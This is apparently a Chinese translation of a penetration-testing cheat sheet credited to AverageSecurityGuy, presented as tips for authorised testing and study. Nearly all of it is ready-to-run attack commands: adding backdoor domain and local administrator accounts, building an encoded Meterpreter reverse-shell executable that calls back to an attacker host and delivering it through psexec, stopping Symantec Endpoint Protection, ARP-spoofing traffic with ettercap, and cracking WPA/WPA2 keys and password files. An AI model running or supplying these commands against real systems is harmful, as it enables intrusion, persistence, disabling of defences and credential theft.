[译]Thanks [原文]AverageSecurityGuy
这里整理了许多渗透测试中实用的TIPS,希望对您有用。PS.仅用于安全渗透测试及学习,禁止非法使用。
共享相关
# Mount Windows Share with Null Session
net use x: \\server\share "" /u:
# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point
系统帐号操作相关
# WINDOWS: Add a domain user and put them in the Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# WINDOWS: Add a local user and put them in the local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username
# LINUX: Set the new user's password
passwd username
# LINUX: If the shell is non-interactive, set the password using chpasswd (note: the password then ends up in the shell history)
echo "username:newpass"|chpasswd
STDAPI_SYS_PROCESS_EXECUTE: OPERATION FAILED: 1314
# If you get this error while trying to drop to a shell
# in meterpreter, try the command below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H
METASPLOIT: 反弹及执行PSEXEC
# Generate an executable (msfpayload/msfencode have since been replaced by msfvenom)
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe
# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...
# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit
# If everything works, you should see a meterpreter
# session open in the multi/handler console
停用杀毒软件
# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop
使用ETTERCAP嗅探流量
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap
WPA/WPA2 PSK破解
# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
使用NMAP建立IPLIST
nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt
使用JOHN和KORELOGIC RULES进行密码破解
for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset}
-w:<wordlist> <password_file> ; done